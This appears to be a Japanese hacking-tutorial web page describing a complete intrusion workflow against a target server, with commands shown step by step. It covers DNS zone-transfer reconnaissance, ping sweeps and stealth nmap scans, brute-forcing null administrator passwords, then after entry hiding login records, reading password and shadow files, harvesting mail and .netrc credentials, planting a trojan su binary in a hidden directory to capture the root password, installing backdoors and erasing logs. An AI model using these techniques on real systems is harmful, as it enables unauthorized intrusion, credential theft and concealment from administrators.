特別講座＜踏み台確保編＞を参照せよ。

■ターゲッティング

　基礎ターゲッティング講座と標準ターゲッティング講座と応用ターゲッティング講座を参照せよ。

１、ターゲットの簡単な情報を集める（コマンドhost,finger）。

% host ipusiron.mil←商用ネットワーク環境の場合、メールとファイアウォールを同一システム上にある場合がある。

% host -l ipusiron.mil

% host -l -v -t any ipusirom.mil←hostコマンドは、nslookupコマンドとdigコマンドを組み合わせたものと同じぐらいの情報を集める。さらに、読みやすいフォーマットです。

% host -l ipusiron.mil | cut -f 4 -d" " > /tmp/ip-list

% finger ipusiron.mil

２、ターゲットの情報をさらに集める（コマンドwhois,nslookup,dig）。

% nslookup 192.168.1.1

% whois -n whois.arin.net （組織名）

% whois （DNSサーバ）@whois.arin.net

% whois （サーバ名）

% whois ""@whois.internic.net

% nslookup

> server （DNSサーバのIPアドレス）

> set type=any

> ls -d ipusiron.mil > /tmp/zone-list

% grep -I solaris zone-list | wc -l

% grep -I test zone-list | wc -l←テストシステムを探す。

３、ターゲットのサイトがあれば、熟読しておくと管理人のアドレスなどがわかるかもしれません。ソースを見ると、使用しているホームページ作成ソフトや更新頻度が分かるでしょう。

４、ターゲットを特定した後、ネットワークトポロジーを検査する。

$ traceroute ipusrion.mil

$ traceroute -S -p53 xxx.xxx.xxx.xxx←DNSクエリーのUDP53と指定する。

■侵入準備（スキャン）

１、pingスイープをする（例；Unixならばfping、WinならばPinger）

$ gping

$ gping 192 168 1 1 254

$ gping 192 168 1 1 254 | fping -a

# nmap -sP -PT80（ポート番号） 192.168.1.0/24←DMZに到達できる可能性が高いポート80

２、トレースルーティングをする。

$ traceroute www.ipusiron.mil

1 xxx.xxx.co.jp (xxx.xxx.xxx.xxx)

（中略）

4 xxxx.xxxx.com (192.168.0,1)←ターゲットのサーバの直前が192.168.0,1なので、これがルータだと分かる。

5 www.ipusiron.mil (192.168.2,100)

３、ルータにポートスキャンする。

# nmap -p1-25,80,512,515,2001,4001,6001,9001 (ルータのIPアドレス)←Ciscoのルータを検出する。Ciscoルータの特徴は、ポート23と2001にTelnetすると、”User Access Verijication”プロンプトが表示されることです。

# nmap -O -p13 -n xxx.xxx.xxx.xxx←TCPポート13がオープンである時、-OオプションをつけてOSを特定する。

# finger -l @<host>

４、ターゲットサーバにポートスキャンをする（サービス、OSの特定）。←標準ポートスキャン講座を参照せよ。

# nmap -sS xxx.xxx.xxx.xxx (-D)←SYNスキャン（検出できない可能性あり）。Dオプションは、デコイ機能。

# nmap -o xxx.xxx.xxx.xxx

# namp -p80 -o xxx.xxx.xxx.xxx←ターゲットサーバがポートをオープンしてない場合にもOS推測可能（精度は落ちる）。

# rpcinfo -p xxx.xxx.xxx.xxx

５、NFSのサービスを提供しているならば、以下のコマンドでさらに情報を得る。

# rsers xxx.xxx.xxx.xxx

# showmount -e xxx.xxx.xxx.xxx

# pscan -n xxx.xxx.xxx.xxx

６、OSがWindowsNTの時は、ダメ元でブルートフォースアタック（詳細は、基礎ブルートフォースアタック講座を参照せよ）を試して見る。成功したらここから読んでください。実際にWindowsNTネットワークの多くには少なくとも1台はAdministratorアカウントのパスワードがnull（空白）のままのサーバやワークステーションがあるのが実態らしい。

■侵入直前

１、ターゲットサーバのOSのセキュリティーホールを調べておく。

２、ターゲットサーバに合うExploitやログ消しなどを手に入れる。

３、必要ならば、SnifferやTrojanやBackdoorを用意しておく。

■リモートからアタック

１、ブルート･フォース・アタックを試みる（Joeやrootのデフォルトパスワードを試す程度）。

２、リモート・スタック・オーバーフローを利用する（特別講座＜リモートスタックオーバーフロー編＞を参照せよ）。

もし、rootを手に入れたらこちら、ユーザ権限を手に入れたらこちらを見てください。

■侵入成功（root権限はまだ奪取していない場合）

１、lastloginを消しておく。

[ipusiron@ipusiron hack]$ telnet localhost（自分のIPアドレスは192.168.1.3で、侵入しているサーバのIPアドレスは192.168.1.2とする）

Trying 127.0.0.1...

Connected to localhost.localdomain.

Escape character is '^]'.

Vine Linux 2.0 (Sociando-Mallet)

Kernel 2.2.14-1vl6 on an i686

login: ipusiron

Password:

Last login: Wed Sep 20 09:19:43 from 192.168.1.3

[ipusiron@ipusiron ipusiron]$ exit

Connection closed by foreign host.

[ipusiron@ipusiron hack]$ last ipusiron | head -1

ipusiron pts/1 localhost.locald Wed Sep 20 09:22 - 09:24 (00:01)←lastloginをごまかしできた！

２、一応、/etc/passwdを見に行く。

[ipusiron@ipusiron hack]$ cat < /etc/passwd

シャドーパスワードでなかったら、即johnでパスクラックする。

３、コマンドwまたはwhoを使う。

[ipusiron@ipusiron hack]$ who

ipusiron pts/0 Sep 20 08:24

４、コマンドidやwhoamiを使って、自分自身を調べる。

[ipusiron@ipusiron hack]$ id

uid=500(ipusiron) gid=500(ipusiron)

[ipusiron@ipusiron hack]$ whoami

ipusiron

５、Sendmailの共有スペースの/var/spool/mailに行って、おもしろいメールがあるかどうか調べる。ちなみに、qmailの培は、ユーザのホームディレクトリ内のmboxで見れます。

[ipusiron@ipusiron hack]$ cat /var/spool/mail/ipusiron

６、各ユーザのドットファイルを除く。

[ipusiron@ipusiron hack]$ cat /home/ipusrion/.fetcmail←メールサーバのIDとPasswordがGetできる！

[ipusiron@ipusiron hack]$ cat /home/ipusiron/.netrc←rシステムのログインに使うサーバアドレス、ID、PasswordがGetできる！

７、OS情報を調べる。

[ipusiron@ipusiron hack]$ uname -a

Linux ipusiron.mil 2.2.14-1vl6 #1 Mon Mar 13 18:39:36 JST 2000 i686 unknown

８、設定ファイルを見てみる。

[ipusiron@ipusiron hack]$ cat /etc/inetd.conf | more

[ipusiron@ipusiron hack]$ cat /etc/services | more

[ipusiron@ipusiron hack]$ cat /etc/syslog.conf | more

[ipusiron@ipusiron hack]$ cat /etc/shadow | more

[ipusiron@ipusiron hack]$ cat /etc/master.passwd | more

９、Sendmailのバージョンを確認する。

[ipusiron@ipusiron hack]$ /usr/sbin/sendmail -d0.1 < /dev/null

（$ echo | /usr/lib/sendmail -d0.1でも可）

Version 8.9.3+3.2W

（中略）

１０、HTTPdのバージョンを調べる。

[ipusiron@ipusiron hack]$ /usr/sbin/httpd -v

１１、各OS、各バージョン、各デーモンに合ったExploitを探しておき、それを実行してroot権限を奪取する。

１２、TrojanでrootのパスワードをGetする（標準Trojan講座を参照せよ）。

% uname -a←OSを調べる。

% cat >sut.c

...（コピペ）

^D

% cc sut.c -o su

% pwd

/home/ipusiron

% mkdir .kon←隠すためのディレクトリを作る

% cd .kon

% mv su .kon

% rm sut.c

% vi .cshrc←パスを設定する。

set path=(/home/ipusiron/.kon （中略）)←下線部が追加したところ

% source .cshrc←これで.cshrcを反映させる。

これで完了。後は、誰かがsuを実行するのを待つのみ。

■侵入成功（root権限は奪取した）

１、好きなことをしてしましょう。

２、Backdoorを仕掛ける。

３、ログを消す（特別講座＜Log消し編＞を参照せよ）。

４、今まで使った、TrojanやExploitなどは削除しておく。

• 『コンピュータ悪のマニュアル３』
• 『Windowsのハッキングマニュアル2000』
• 『クラッキング対策ファイナルガイド』

あなたの悩み解決します 過払い金の回収ならこちら 給料前でお金がない・・